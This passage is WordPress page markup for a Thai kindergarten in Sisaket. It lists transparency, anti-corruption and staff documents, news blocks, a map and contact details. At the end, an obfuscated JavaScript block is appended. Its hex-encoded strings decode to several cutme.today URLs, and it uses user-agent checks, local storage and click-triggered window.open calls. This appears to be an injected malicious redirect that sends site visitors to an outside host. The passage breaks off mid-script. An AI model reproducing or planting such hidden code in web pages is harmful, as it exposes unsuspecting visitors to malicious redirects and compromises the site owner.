900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\